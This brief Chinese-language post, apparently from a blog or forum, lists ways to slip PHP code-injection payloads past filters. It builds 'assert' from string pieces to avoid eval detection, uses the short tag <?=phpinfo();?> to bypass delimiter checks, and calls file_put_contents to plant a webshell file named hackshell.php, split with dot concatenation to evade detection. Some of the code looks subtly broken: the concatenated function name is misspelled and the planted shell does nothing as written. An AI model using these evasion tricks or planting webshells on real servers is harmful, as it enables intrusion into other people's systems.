检测eval的时候 可以用assert来拼接
$a=’as’.’errt’;
检测界定符的时候 可以用 短标签
<?=phpinfo();?>
可以用file_put_contents 在当前目录下生成一个shell文件 检测的话可以用 点号来拼接
file_put_contents('./hackshell.php', '<?php $_GET'.'[a];?>');echo '<a href=./hackshell.php>a</a>';
若有收获,就点个赞吧
0 人点赞
